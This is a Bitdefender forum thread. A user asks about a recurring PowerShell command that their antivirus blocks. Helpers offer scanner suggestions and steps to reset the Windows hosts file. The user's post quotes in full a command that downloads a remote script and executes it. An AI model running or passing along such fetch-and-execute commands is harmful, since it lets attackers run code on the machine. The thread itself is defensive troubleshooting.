Every few days i get the same threat, that Bidfender then blocks
So, as the title says, every few days I get the same malicious command from powershell:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -UseBasicParsing -Uri https://wqyspjbmkoapqql.s3.amazonaws.com/reinstall-agent.ps1 | iex"
What is this? How can I stop it from happening?
Thanks
Answers
-
The command you're seeing indicates a potential security issue. It appears to be an attempt to download and execute a PowerShell s.c.r.i.p.t (reinstall-agent.ps1) from an Amazon S3 bucket. This could be a malicious attempt to install malware or compromise your system.
As I downloaded the file and uploaded it to VirusTotal, it doesn't seem to be malicious. Below is the VirusTotal link
https://www.virustotal.com/gui/file/8e3a9b9bb0228a41f1bf4095c6d3abe015432ab452d3c9a83b4221ac6173bf47?nocache=1
Perform a full system scan with Bitdefender. You can also use the Rescue Environment (
) if needed.You can also download the portable and online scanners listed below, which do not require installation, for second opinion scanning.
Malwarebytes AdwCleaner:
ESET Online Scanner:
F‑Secure Online Scanner:
Trend Micro HouseCall:
Kaspersky Virus Removal Tool:
Regards
Life happens, Coffee helps!
Show your Attitude, when you reach that Altitude!
Bitdefender Ultimate Security Plus (user)
0 -
I appreciate the help. But does that mean I shouldn't worry about it? Is there any way to close that door?
0 -
I just updated my previous comment. You can download the portable and online scanners listed, which do not require installation, for second opinion scanning.
For more information, kindly contact Bitdefender support by visiting
Select, How to's & Troubleshooting Bitdefender products→Troubleshooting→I don't know→Contact Support→ You will get the option of chat, call or email.
Regards
Life happens, Coffee helps!
Show your Attitude, when you reach that Altitude!
Bitdefender Ultimate Security Plus (user)
0 -
I run those programs and Kapersky keeps fidind the same "object", independetly of the option I chose (cure, delete or Quarantine). When I restart, he finds it again
0 -
Hosts Rollback Malware is a type of malicious software that targets your computer's "hosts" file, a critical component that directs how your system handles web traffic. This file usually maps hostnames to IP addresses, ensuring that when you type a web address, you’re directed to the correct site.
First, ensure that the "Scan hosts file" option is enabled in your Bitdefender product by opening the Bitdefender interface and navigating to Protection → Vulnerability → Settings. If "Scan hosts file" is enabled, proceed with the steps below. If it’s not enabled, turn it on and run a full system scan with your Bitdefender product. If the scan still doesn’t detect anything, continue with the steps provided below.
In the same location where Kaspersky detected the "hosts.rollback" file as malicious, you can simply go and delete the file manually. Afterwards, in that same location, you should also see another file named "hosts," which you should reset or replace following the provided instructions below.
Kindly follow the steps to reset the hosts file provided in the Microsoft Support link below.
If you do not want to manually replace the hosts file, you can try using hosts file reset software that will replace your malicious hosts file with the default Windows hosts file. Consider using the standalone hosts file editor mentioned below, which does not require any installation.
Host Mechanic:
BlueLife Hosts Editor v1.5:
If you're using BlueLife Hosts Editor v1.5, make sure only the following entries remain in the hosts file. Remove any other entries that might be present:
If the entries are already in their default state, kindly let us know here.
Regards.
Life happens, Coffee helps!
Show your Attitude, when you reach that Altitude!
Bitdefender Ultimate Security Plus (user)
0